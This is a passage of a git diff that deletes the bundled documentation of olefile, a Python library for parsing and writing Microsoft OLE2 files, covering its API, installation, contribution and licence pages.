-If you think olefile should stay compatible with Python 2.5 or older, please contact me.
-Test if a file is an OLE container
-Use isOleFile to check if the first bytes of the file contain the Magic for OLE files, before opening it. isOleFile returns True if it is an OLE file, False otherwise (new in v0.16).
-assert olefile.isOleFile('myfile.doc')
-The argument of isOleFile can be (new in v0.41):
-
-- the path of the file to open on disk (bytes or unicode string smaller than 1536 bytes),
-- or a bytes string containing the file in memory. (bytes string longer than 1535 bytes),
-- or a file-like object (with read and seek methods).
-
-Open an OLE file from disk
-Create an OleFileIO object with the file path as parameter:
-ole = olefile.OleFileIO('myfile.doc')
-Open an OLE file from a bytes string
-This is useful if the file is already stored in memory as a bytes string.
-ole = olefile.OleFileIO(s)
-Note: olefile checks the size of the string provided as argument to determine if it is a file path or the content of an OLE file. An OLE file cannot be smaller than 1536 bytes. If the string is larger than 1535 bytes, then it is expected to contain an OLE file, otherwise it is expected to be a file path.
-(new in v0.41)
-Open an OLE file from a file-like object
-This is useful if the file is not on disk but only available as a file-like object (with read, seek and tell methods).
-ole = olefile.OleFileIO(f)
-If the file-like object does not have seek or tell methods, the easiest solution is to read the file entirely in a bytes string before parsing:
-data = f.read()
-ole = olefile.OleFileIO(data)
-How to handle malformed OLE files
-By default, the parser is configured to be as robust and permissive as possible, allowing to parse most malformed OLE files. Only fatal errors will raise an exception. It is possible to tell the parser to be more strict in order to raise exceptions for files that do not fully conform to the OLE specifications, using the raise_defect option (new in v0.14):
-ole = olefile.OleFileIO('myfile.doc', raise_defects=olefile.DEFECT_INCORRECT)
-When the parsing is done, the list of non-fatal issues detected is available as a list in the parsing_issues attribute of the OleFileIO object (new in 0.25):
-print('Non-fatal issues raised during parsing:')
-if ole.parsing_issues:
- for exctype, msg in ole.parsing_issues:
- print('- %s: %s' % (exctype.__name__, msg))
-else:
- print('None')
-Open an OLE file in write mode
-Before using the write features, the OLE file must be opened in read/write mode:
-ole = olefile.OleFileIO('test.doc', write_mode=True)
-(new in v0.40)
-The code for write features is new and it has not been thoroughly tested yet. See issue #6 for the roadmap and the implementation status. If you encounter any issue, please send me your feedback or report issues.
-Syntax for stream and storage paths
-Two different syntaxes are allowed for methods that need or return the path of streams and storages:
-
-Either a list of strings including all the storages from the root up to the stream/storage name. For example a stream called "WordDocument" at the root will have ['WordDocument'] as full path. A stream called "ThisDocument" located in the storage "Macros/VBA" will be ['Macros', 'VBA', 'ThisDocument']. This is the original syntax from PIL. While hard to read and not very convenient, this syntax works in all cases.
-Or a single string with slashes to separate storage and stream names (similar to the Unix path syntax). The previous examples would be 'WordDocument' and 'Macros/VBA/ThisDocument'. This syntax is easier, but may fail if a stream or storage name contains a slash (which is normally not allowed, according to the Microsoft specifications [MS-CFB]). (new in v0.15)
-
-Both are case-insensitive.
-Switching between the two is easy:
-slash_path = '/'.join(list_path)
-list_path = slash_path.split('/')
-Encoding:
-
-- Stream and Storage names are stored in Unicode format in OLE files, which means they may contain special characters (e.g. Greek, Cyrillic, Japanese, etc) that applications must support to avoid exceptions.
-- On Python 2.x, all stream and storage paths are handled by olefile in bytes strings, using the UTF-8 encoding by default. If you need to use Unicode instead, add the option path_encoding=None when creating the OleFileIO object. This is new in v0.42. Olefile was using the Latin-1 encoding until v0.41, therefore special characters were not supported.
-- On Python 3.x, all stream and storage paths are handled by olefile in unicode strings, without encoding.
-
-Get the list of streams
-listdir() returns a list of all the streams contained in the OLE file, including those stored in storages. Each stream is listed itself as a list, as described above.
-print(ole.listdir())
-Sample result:
-[['\x01CompObj'], ['\x05DocumentSummaryInformation'], ['\x05SummaryInformation']
-, ['1Table'], ['Macros', 'PROJECT'], ['Macros', 'PROJECTwm'], ['Macros', 'VBA',
-'Module1'], ['Macros', 'VBA', 'ThisDocument'], ['Macros', 'VBA', '_VBA_PROJECT']
-, ['Macros', 'VBA', 'dir'], ['ObjectPool'], ['WordDocument']]
-As an option it is possible to choose if storages should also be listed, with or without streams (new in v0.26):
-ole.listdir (streams=False, storages=True)
-Test if known streams/storages exist:
-exists(path) checks if a given stream or storage exists in the OLE file (new in v0.16). The provided path is case-insensitive.
-if ole.exists('worddocument'):
- print("This is a Word document.")
- if ole.exists('macros/vba'):
- print("This document seems to contain VBA macros.")
-Read data from a stream
-openstream(path) opens a stream as a file-like object. The provided path is case-insensitive.
-The following example extracts the "Pictures" stream from a PPT file:
-pics = ole.openstream('Pictures')
-data = pics.read()
-Get information about a stream/storage
-Several methods can provide the size, type and timestamps of a given stream/storage:
-get_size(path) returns the size of a stream in bytes (new in v0.16):
-s = ole.get_size('WordDocument')
-get_type(path) returns the type of a stream/storage, as one of the following constants: STGTY_STREAM for a stream, STGTY_STORAGE for a storage, STGTY_ROOT for the root entry, and False for a non existing path (new in v0.15).
-t = ole.get_type('WordDocument')
-get_ctime(path) and get_mtime(path) return the creation and modification timestamps of a stream/storage, as a Python datetime object with UTC timezone. Please note that these timestamps are only present if the application that created the OLE file explicitly stored them, which is rarely the case. When not present, these methods return None (new in v0.26).
-c = ole.get_ctime('WordDocument')
-m = ole.get_mtime('WordDocument')
-The root storage is a special case: You can get its creation and modification timestamps using the OleFileIO.root attribute (new in v0.26):
-c = ole.root.getctime()
-m = ole.root.getmtime()
-Note: all these methods are case-insensitive.
-Overwriting a sector
-The write_sect method can overwrite any sector of the file. If the provided data is smaller than the sector size (normally 512 bytes, sometimes 4KB), data is padded with null characters. (new in v0.40)
-Here is an example:
-ole.write_sect(0x17, b'TEST')
-Note: following the MS-CFB specifications, sector 0 is actually the second sector of the file. You may use -1 as index to write the first sector.
-Overwriting a stream
-The write_stream method can overwrite an existing stream in the file. The new stream data must be the exact same size as the existing one. For now, write_stream can only write streams of 4KB or larger (stored in the main FAT).
-For example, you may change text in a MS Word document:
-ole = olefile.OleFileIO('test.doc', write_mode=True)
-data = ole.openstream('WordDocument').read()
-data = data.replace(b'foo', b'bar')
-ole.write_stream('WordDocument', data)
-ole.close()
-(new in v0.40)
-Extract metadata
-get_metadata() will check if standard property streams exist, parse all the properties they contain, and return an OleMetadata object with the found properties as attributes (new in v0.24).
-meta = ole.get_metadata()
-print('Author:', meta.author)
-print('Title:', meta.title)
-print('Creation date:', meta.create_time)
-# print all metadata:
-meta.dump()
-Available attributes include:
-codepage, title, subject, author, keywords, comments, template,
-last_saved_by, revision_number, total_edit_time, last_printed, create_time,
-last_saved_time, num_pages, num_words, num_chars, thumbnail,
-creating_application, security, codepage_doc, category, presentation_target,
-bytes, lines, paragraphs, slides, notes, hidden_slides, mm_clips,
-scale_crop, heading_pairs, titles_of_parts, manager, company, links_dirty,
-chars_with_spaces, unused, shared_doc, link_base, hlinks, hlinks_changed,
-version, dig_sig, content_type, content_status, language, doc_version
-See the source code of the OleMetadata class for more information.
-Parse a property stream
-get_properties(path) can be used to parse any property stream that is not handled by get_metadata. It returns a dictionary indexed by integers. Each integer is the index of the property, pointing to its value. For example in the standard property stream '05SummaryInformation', the document title is property #2, and the subject is #3.
-p = ole.getproperties('specialprops')
-By default as in the original PIL version, timestamp properties are converted into a number of seconds since Jan 1,1601. With the option convert_time, you can obtain more convenient Python datetime objects (UTC timezone). If some time properties should not be converted (such as total editing time in '05SummaryInformation'), the list of indexes can be passed as no_conversion (new in v0.25):
-p = ole.getproperties('specialprops', convert_time=True, no_conversion=[10])
-Close the OLE file
-Unless your application is a simple script that terminates after processing an OLE file, do not forget to close each OleFileIO object after parsing to close the file on disk. (new in v0.22)
-ole.close()
-Use olefile as a script for testing/debugging
-olefile can also be used as a script from the command-line to display the structure of an OLE file and its metadata, for example:
-olefile.py myfile.doc
-You can use the option -c to check that all streams can be read fully, and -d to generate very verbose debugging information.
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/API.md b/oletools/thirdparty/olefile/doc/API.md
deleted file mode 100644
index e4a96679..00000000
--- a/oletools/thirdparty/olefile/doc/API.md
+++ /dev/null
@@ -1,313 +0,0 @@
-How to use olefile - API
-========================
-
-This page is part of the documentation for [olefile](https://bitbucket.org/decalage/olefileio_pl/wiki). It explains
-how to use all its features to parse and write OLE files. For more information about OLE files, see [[OLE_Overview]].
-
-olefile can be used as an independent module or with PIL/Pillow. The main functions and methods are explained below.
-
-For more information, see also the file **olefile.html**, sample code at the end of the module itself, and docstrings within the code.
-
-
-
-Import olefile
---------------
-
-When the olefile package has been installed, it can be imported in Python applications with this statement:
-
- :::python
- import olefile
-
-Before v0.40, olefile was named OleFileIO_PL. To maintain backward compatibility with older applications and samples, a
-simple script is also installed so that the following statement imports olefile as OleFileIO_PL:
-
- :::python
- import OleFileIO_PL
-
-As of version 0.30, the code has been changed to be compatible with Python 3.x. As a consequence, compatibility with
-Python 2.5 or older is not provided anymore. However, a copy of OleFileIO_PL v0.26 (with some backported enhancements)
-is available as olefile2.py. When importing the olefile package, it falls back automatically to olefile2 if running on
-Python 2.5 or older. This is implemented in olefile/__init__.py. (new in v0.40)
-
-If you think olefile should stay compatible with Python 2.5 or older, please [contact me](http://decalage.info/contact).
-
-
-## Test if a file is an OLE container
-
-Use **isOleFile** to check if the first bytes of the file contain the Magic for OLE files, before opening it. isOleFile
-returns True if it is an OLE file, False otherwise (new in v0.16).
-
- :::python
- assert olefile.isOleFile('myfile.doc')
-
-The argument of isOleFile can be (new in v0.41):
-
-- the path of the file to open on disk (bytes or unicode string smaller than 1536 bytes),
-- or a bytes string containing the file in memory. (bytes string longer than 1535 bytes),
-- or a file-like object (with read and seek methods).
-
-## Open an OLE file from disk
-
-Create an **OleFileIO** object with the file path as parameter:
-
- :::python
- ole = olefile.OleFileIO('myfile.doc')
-
-## Open an OLE file from a bytes string
-
-This is useful if the file is already stored in memory as a bytes string.
-
- :::python
- ole = olefile.OleFileIO(s)
-
-Note: olefile checks the size of the string provided as argument to determine if it is a file path or the content of an
-OLE file. An OLE file cannot be smaller than 1536 bytes. If the string is larger than 1535 bytes, then it is expected to
-contain an OLE file, otherwise it is expected to be a file path.
-
-(new in v0.41)
-
-
-## Open an OLE file from a file-like object
-
-This is useful if the file is not on disk but only available as a file-like object (with read, seek and tell methods).
-
- :::python
- ole = olefile.OleFileIO(f)
-
-If the file-like object does not have seek or tell methods, the easiest solution is to read the file entirely in
-a bytes string before parsing:
-
- :::python
- data = f.read()
- ole = olefile.OleFileIO(data)
-
-
-## How to handle malformed OLE files
-
-By default, the parser is configured to be as robust and permissive as possible, allowing to parse most malformed OLE files. Only fatal errors will raise an exception. It is possible to tell the parser to be more strict in order to raise exceptions for files that do not fully conform to the OLE specifications, using the raise_defect option (new in v0.14):
-
- :::python
- ole = olefile.OleFileIO('myfile.doc', raise_defects=olefile.DEFECT_INCORRECT)
-
-When the parsing is done, the list of non-fatal issues detected is available as a list in the parsing_issues attribute of the OleFileIO object (new in 0.25):
-
- :::python
- print('Non-fatal issues raised during parsing:')
- if ole.parsing_issues:
- for exctype, msg in ole.parsing_issues:
- print('- %s: %s' % (exctype.__name__, msg))
- else:
- print('None')
-
-
-## Open an OLE file in write mode
-
-Before using the write features, the OLE file must be opened in read/write mode:
-
- :::python
- ole = olefile.OleFileIO('test.doc', write_mode=True)
-
-(new in v0.40)
-
-The code for write features is new and it has not been thoroughly tested yet. See [issue #6](https://bitbucket.org/decalage/olefileio_pl/issue/6/improve-olefileio_pl-to-write-ole-files) for the roadmap and the implementation status. If you encounter any issue, please send me your [feedback](http://www.decalage.info/en/contact) or [report issues](https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open).
-
-
-## Syntax for stream and storage paths
-
-Two different syntaxes are allowed for methods that need or return the path of streams and storages:
-
-1) Either a **list of strings** including all the storages from the root up to the stream/storage name. For example a
-stream called "WordDocument" at the root will have ['WordDocument'] as full path. A stream called "ThisDocument"
-located in the storage "Macros/VBA" will be ['Macros', 'VBA', 'ThisDocument']. This is the original syntax from PIL.
-While hard to read and not very convenient, this syntax works in all cases.
-
-2) Or a **single string with slashes** to separate storage and stream names (similar to the Unix path syntax).
-The previous examples would be 'WordDocument' and 'Macros/VBA/ThisDocument'. This syntax is easier, but may fail if a
-stream or storage name contains a slash (which is normally not allowed, according to the Microsoft specifications [MS-CFB]). (new in v0.15)
-
-Both are case-insensitive.
-
-Switching between the two is easy:
-
- :::python
- slash_path = '/'.join(list_path)
- list_path = slash_path.split('/')
-
-**Encoding**:
-
-- Stream and Storage names are stored in Unicode format in OLE files, which means they may contain special characters
- (e.g. Greek, Cyrillic, Japanese, etc) that applications must support to avoid exceptions.
-- **On Python 2.x**, all stream and storage paths are handled by olefile in bytes strings, using the **UTF-8 encoding**
- by default. If you need to use Unicode instead, add the option **path_encoding=None** when creating the OleFileIO
- object. This is new in v0.42. Olefile was using the Latin-1 encoding until v0.41, therefore special characters were
- not supported.
-- **On Python 3.x**, all stream and storage paths are handled by olefile in unicode strings, without encoding.
-
-## Get the list of streams
-
-listdir() returns a list of all the streams contained in the OLE file, including those stored in storages.
-Each stream is listed itself as a list, as described above.
-
- :::python
- print(ole.listdir())
-
-Sample result:
-
- :::python
- [['\x01CompObj'], ['\x05DocumentSummaryInformation'], ['\x05SummaryInformation']
- , ['1Table'], ['Macros', 'PROJECT'], ['Macros', 'PROJECTwm'], ['Macros', 'VBA',
- 'Module1'], ['Macros', 'VBA', 'ThisDocument'], ['Macros', 'VBA', '_VBA_PROJECT']
- , ['Macros', 'VBA', 'dir'], ['ObjectPool'], ['WordDocument']]
-
-As an option it is possible to choose if storages should also be listed, with or without streams (new in v0.26):
-
- :::python
- ole.listdir (streams=False, storages=True)
-
-
-## Test if known streams/storages exist:
-
-exists(path) checks if a given stream or storage exists in the OLE file (new in v0.16). The provided path is case-insensitive.
-
- :::python
- if ole.exists('worddocument'):
- print("This is a Word document.")
- if ole.exists('macros/vba'):
- print("This document seems to contain VBA macros.")
-
-
-## Read data from a stream
-
-openstream(path) opens a stream as a file-like object. The provided path is case-insensitive.
-
-The following example extracts the "Pictures" stream from a PPT file:
-
- :::python
- pics = ole.openstream('Pictures')
- data = pics.read()
-
-
-## Get information about a stream/storage
-
-Several methods can provide the size, type and timestamps of a given stream/storage:
-
-get_size(path) returns the size of a stream in bytes (new in v0.16):
-
- :::python
- s = ole.get_size('WordDocument')
-
-get_type(path) returns the type of a stream/storage, as one of the following constants: STGTY\_STREAM for a stream, STGTY\_STORAGE for a storage, STGTY\_ROOT for the root entry, and False for a non existing path (new in v0.15).
-
- :::python
- t = ole.get_type('WordDocument')
-
-get\_ctime(path) and get\_mtime(path) return the creation and modification timestamps of a stream/storage, as a Python datetime object with UTC timezone. Please note that these timestamps are only present if the application that created the OLE file explicitly stored them, which is rarely the case. When not present, these methods return None (new in v0.26).
-
- :::python
- c = ole.get_ctime('WordDocument')
- m = ole.get_mtime('WordDocument')
-
-The root storage is a special case: You can get its creation and modification timestamps using the OleFileIO.root attribute (new in v0.26):
-
- :::python
- c = ole.root.getctime()
- m = ole.root.getmtime()
-
-Note: all these methods are case-insensitive.
-
-## Overwriting a sector
-
-The write_sect method can overwrite any sector of the file. If the provided data is smaller than the sector size (normally 512 bytes, sometimes 4KB), data is padded with null characters. (new in v0.40)
-
-Here is an example:
-
- :::python
- ole.write_sect(0x17, b'TEST')
-
-Note: following the [MS-CFB specifications](http://msdn.microsoft.com/en-us/library/dd942138.aspx), sector 0 is actually the second sector of the file. You may use -1 as index to write the first sector.
-
-
-## Overwriting a stream
-
-The write_stream method can overwrite an existing stream in the file. The new stream data must be the exact same size as the existing one. For now, write_stream can only write streams of 4KB or larger (stored in the main FAT).
-
-For example, you may change text in a MS Word document:
-
- :::python
- ole = olefile.OleFileIO('test.doc', write_mode=True)
- data = ole.openstream('WordDocument').read()
- data = data.replace(b'foo', b'bar')
- ole.write_stream('WordDocument', data)
- ole.close()
-
-(new in v0.40)
-
-
-
-## Extract metadata
-
-get_metadata() will check if standard property streams exist, parse all the properties they contain, and return an OleMetadata object with the found properties as attributes (new in v0.24).
-
- :::python
- meta = ole.get_metadata()
- print('Author:', meta.author)
- print('Title:', meta.title)
- print('Creation date:', meta.create_time)
- # print all metadata:
- meta.dump()
-
-Available attributes include:
-
- :::text
- codepage, title, subject, author, keywords, comments, template,
- last_saved_by, revision_number, total_edit_time, last_printed, create_time,
- last_saved_time, num_pages, num_words, num_chars, thumbnail,
- creating_application, security, codepage_doc, category, presentation_target,
- bytes, lines, paragraphs, slides, notes, hidden_slides, mm_clips,
- scale_crop, heading_pairs, titles_of_parts, manager, company, links_dirty,
- chars_with_spaces, unused, shared_doc, link_base, hlinks, hlinks_changed,
- version, dig_sig, content_type, content_status, language, doc_version
-
-See the source code of the OleMetadata class for more information.
-
-
-## Parse a property stream
-
-get\_properties(path) can be used to parse any property stream that is not handled by get\_metadata. It returns a dictionary indexed by integers. Each integer is the index of the property, pointing to its value. For example in the standard property stream '\x05SummaryInformation', the document title is property #2, and the subject is #3.
-
- :::python
- p = ole.getproperties('specialprops')
-
-By default as in the original PIL version, timestamp properties are converted into a number of seconds since Jan 1,1601. With the option convert\_time, you can obtain more convenient Python datetime objects (UTC timezone). If some time properties should not be converted (such as total editing time in '\x05SummaryInformation'), the list of indexes can be passed as no_conversion (new in v0.25):
-
- :::python
- p = ole.getproperties('specialprops', convert_time=True, no_conversion=[10])
-
-
-## Close the OLE file
-
-Unless your application is a simple script that terminates after processing an OLE file, do not forget to close each OleFileIO object after parsing to close the file on disk. (new in v0.22)
-
- :::python
- ole.close()
-
-## Use olefile as a script for testing/debugging
-
-olefile can also be used as a script from the command-line to display the structure of an OLE file and its metadata, for example:
-
- :::text
- olefile.py myfile.doc
-
-You can use the option -c to check that all streams can be read fully, and -d to generate very verbose debugging information.
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/Contribute.html b/oletools/thirdparty/olefile/doc/Contribute.html
deleted file mode 100644
index 2ae57ca8..00000000
--- a/oletools/thirdparty/olefile/doc/Contribute.html
+++ /dev/null
@@ -1,28 +0,0 @@
-
-
-
-
-
-
-
-
-
-How to Suggest Improvements, Report Issues or Contribute
-This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
-To suggest improvements, report a bug or any issue, please use the issue reporting page, providing all the information and files to reproduce the problem.
-If possible please join the debugging output of olefile. For this, launch the following command :
- olefile.py -d -c file >debug.txt
-You may also contact the author directly to provide feedback.
-The code is available in a Mercurial repository on Bitbucket. You may use it to submit enhancements using forks and pull requests.
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/Contribute.md b/oletools/thirdparty/olefile/doc/Contribute.md
deleted file mode 100644
index 0de1e4b8..00000000
--- a/oletools/thirdparty/olefile/doc/Contribute.md
+++ /dev/null
@@ -1,28 +0,0 @@
-How to Suggest Improvements, Report Issues or Contribute
-========================================================
-
-This is a personal open-source project, developed on my spare time. Any contribution, suggestion, feedback or bug report is welcome.
-
-To **suggest improvements, report a bug or any issue**, please use the [issue reporting page](https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open), providing all the information and files to reproduce the problem.
-
-If possible please join the debugging output of olefile. For this, launch the following command :
-
- :::text
- olefile.py -d -c file >debug.txt
-
-
-You may also [contact the author](http://decalage.info/contact) directly to **provide feedback**.
-
-The code is available in [a Mercurial repository on Bitbucket](https://bitbucket.org/decalage/olefileio_pl). You may use it to **submit enhancements** using forks and pull requests.
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/Home.html b/oletools/thirdparty/olefile/doc/Home.html
deleted file mode 100644
index 57e734d7..00000000
--- a/oletools/thirdparty/olefile/doc/Home.html
+++ /dev/null
@@ -1,62 +0,0 @@
-
-
-
-
-
-
-
-
-
-olefile v0.42 documentation
-This is the home page of the documentation for olefile. The latest version can be found online, otherwise a copy is provided in the doc subfolder of the package.
-olefile is a Python package to parse, read and write Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office 97-2003 documents, Image Composer and FlashPix files, Outlook messages, StickyNotes, several Microscopy file formats, McAfee antivirus quarantine files, etc.
-Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the author - Repository - Updates on Twitter
-Documentation pages
-
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-Features
-
-- Parse, read and write any OLE file such as Microsoft Office 97-2003 legacy document formats (Word .doc, Excel .xls, PowerPoint .ppt, Visio .vsd, Project .mpp), Image Composer and FlashPix files, Outlook messages, StickyNotes, Zeiss AxioVision ZVI files, Olympus FluoView OIB files, etc
-- List all the streams and storages contained in an OLE file
-- Open streams as files
-- Parse and read property streams, containing metadata of the file
-- Portable, pure Python module, no dependency
-
-olefile can be used as an independent module or with PIL/Pillow.
-olefile is mostly meant for developers. If you are looking for tools to analyze OLE files or to extract data (especially for security purposes such as malware analysis and forensics), then please also check my python-oletools, which are built upon olefile and provide a higher-level interface.
-History
-olefile is based on the OleFileIO module from PIL, the excellent Python Imaging Library, created and maintained by Fredrik Lundh. The olefile API is still compatible with PIL, but since 2005 I have improved the internal implementation significantly, with new features, bugfixes and a more robust design. From 2005 to 2014 the project was called OleFileIO_PL, and in 2014 I changed its name to olefile to celebrate its 9 years and its new write features.
-As far as I know, this module is the most complete and robust Python implementation to read MS OLE2 files, portable on several operating systems. (please tell me if you know other similar Python modules)
-Since 2014 olefile/OleFileIO_PL has been integrated into Pillow, the friendly fork of PIL. olefile will continue to be improved as a separate project, and new versions will be merged into Pillow regularly.
-Main improvements over the original version of OleFileIO in PIL:
-
-- Compatible with Python 3.x and 2.6+
-- Many bug fixes
-- Support for files larger than 6.8MB
-- Support for 64 bits platforms and big-endian CPUs
-- Robust: many checks to detect malformed files
-- Runtime option to choose if malformed files should be parsed or raise exceptions
-- Improved API
-- Metadata extraction, stream/storage timestamps (e.g. for document forensics)
-- Can open file-like objects
-- Added setup.py and install.bat to ease installation
-- More convenient slash-based syntax for stream paths
-- Write features
-
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/Home.md b/oletools/thirdparty/olefile/doc/Home.md
deleted file mode 100644
index 4f22e554..00000000
--- a/oletools/thirdparty/olefile/doc/Home.md
+++ /dev/null
@@ -1,94 +0,0 @@
-olefile v0.42 documentation
-===========================
-
-This is the home page of the documentation for olefile. The latest version can be found
-[online](https://bitbucket.org/decalage/olefileio_pl/wiki), otherwise a copy is provided in the doc subfolder of the package.
-
-[olefile](http://www.decalage.info/olefile) is a Python package to parse, read and write
-[Microsoft OLE2 files](http://en.wikipedia.org/wiki/Compound_File_Binary_Format)
-(also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft
-Office 97-2003 documents, Image Composer and FlashPix files, Outlook messages, StickyNotes, several Microscopy file
-formats, McAfee antivirus quarantine files, etc.
-
-
-**Quick links:**
-[Home page](http://www.decalage.info/olefile) -
-[Download/Install](https://bitbucket.org/decalage/olefileio_pl/wiki/Install) -
-[Documentation](https://bitbucket.org/decalage/olefileio_pl/wiki) -
-[Report Issues/Suggestions/Questions](https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open) -
-[Contact the author](http://decalage.info/contact) -
-[Repository](https://bitbucket.org/decalage/olefileio_pl) -
-[Updates on Twitter](https://twitter.com/decalage2)
-
-Documentation pages
--------------------
-
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
-
-
-Features
---------
-
-- Parse, read and write any OLE file such as Microsoft Office 97-2003 legacy document formats (Word .doc, Excel .xls,
- PowerPoint .ppt, Visio .vsd, Project .mpp), Image Composer and FlashPix files, Outlook messages, StickyNotes, Zeiss
- AxioVision ZVI files, Olympus FluoView OIB files, etc
-- List all the streams and storages contained in an OLE file
-- Open streams as files
-- Parse and read property streams, containing metadata of the file
-- Portable, pure Python module, no dependency
-
-olefile can be used as an independent module or with PIL/Pillow.
-
-olefile is mostly meant for developers. If you are looking for tools to analyze OLE files or to extract data
-(especially for security purposes such as malware analysis and forensics), then please also check my
-[python-oletools](http://www.decalage.info/python/oletools), which are built upon olefile and provide a higher-level
-interface.
-
-
-History
--------
-
-olefile is based on the OleFileIO module from [PIL](http://www.pythonware.com/products/pil/index.htm), the excellent
-Python Imaging Library, created and maintained by Fredrik Lundh. The olefile API is still compatible with PIL, but
-since 2005 I have improved the internal implementation significantly, with new features, bugfixes and a more robust
-design. From 2005 to 2014 the project was called OleFileIO_PL, and in 2014 I changed its name to olefile to celebrate
-its 9 years and its new write features.
-
-As far as I know, this module is the most complete and robust Python implementation to read MS OLE2 files, portable on
-several operating systems. (please tell me if you know other similar Python modules)
-
-Since 2014 olefile/OleFileIO_PL has been integrated into [Pillow](http://python-imaging.github.io/), the friendly fork
-of PIL. olefile will continue to be improved as a separate project, and new versions will be merged into Pillow regularly.
-
-Main improvements over the original version of OleFileIO in PIL:
-----------------------------------------------------------------
-
-- Compatible with Python 3.x and 2.6+
-- Many bug fixes
-- Support for files larger than 6.8MB
-- Support for 64 bits platforms and big-endian CPUs
-- Robust: many checks to detect malformed files
-- Runtime option to choose if malformed files should be parsed or raise exceptions
-- Improved API
-- Metadata extraction, stream/storage timestamps (e.g. for document forensics)
-- Can open file-like objects
-- Added setup.py and install.bat to ease installation
-- More convenient slash-based syntax for stream paths
-- Write features
-
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/Install.html b/oletools/thirdparty/olefile/doc/Install.html
deleted file mode 100644
index 1560a942..00000000
--- a/oletools/thirdparty/olefile/doc/Install.html
+++ /dev/null
@@ -1,30 +0,0 @@
-
-
-
-
-
-
-
-
-
-How to Download and Install olefile
-Pre-requisites
-olefile requires Python 2.6, 2.7 or 3.x.
-For Python 2.5 and older, olefile falls back to an older version (based on OleFileIO_PL 0.26) which might not contain all the enhancements implemented in olefile.
-Download and Install
-To use olefile with other Python applications or your own scripts, the simplest solution is to run pip install olefile or easy_install olefile, to download and install the package in one go. Pip is part of the standard Python distribution since v2.7.9.
-To update olefile if a previous version is already installed, run pip install -U olefile.
-Otherwise you may download/extract the zip archive in a temporary directory and run python setup.py install.
-On Windows you may simply double-click on install.bat.
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/Install.md b/oletools/thirdparty/olefile/doc/Install.md
deleted file mode 100644
index 6afa6245..00000000
--- a/oletools/thirdparty/olefile/doc/Install.md
+++ /dev/null
@@ -1,37 +0,0 @@
-How to Download and Install olefile
-===================================
-
-Pre-requisites
---------------
-
-olefile requires Python 2.6, 2.7 or 3.x.
-
-For Python 2.5 and older, olefile falls back to an older version (based on OleFileIO_PL 0.26) which might not contain
-all the enhancements implemented in olefile.
-
-
-Download and Install
---------------------
-
-To use olefile with other Python applications or your own scripts, the simplest solution is to run **pip install olefile**
-or **easy_install olefile**, to download and install the package in one go. Pip is part of the standard Python
-distribution since v2.7.9.
-
-To update olefile if a previous version is already installed, run **pip install -U olefile**.
-
-Otherwise you may download/extract the [zip archive](https://bitbucket.org/decalage/olefileio_pl/downloads) in a
-temporary directory and run **python setup.py install**.
-
-On Windows you may simply double-click on **install.bat**.
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/License.html b/oletools/thirdparty/olefile/doc/License.html
deleted file mode 100644
index f83c512d..00000000
--- a/oletools/thirdparty/olefile/doc/License.html
+++ /dev/null
@@ -1,40 +0,0 @@
-
-
-
-
-
-
-
-
-
-License for olefile
-olefile (formerly OleFileIO_PL) is copyright (c) 2005-2015 Philippe Lagadec (http://www.decalage.info)
-All rights reserved.
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-
-- Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
-- Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
-
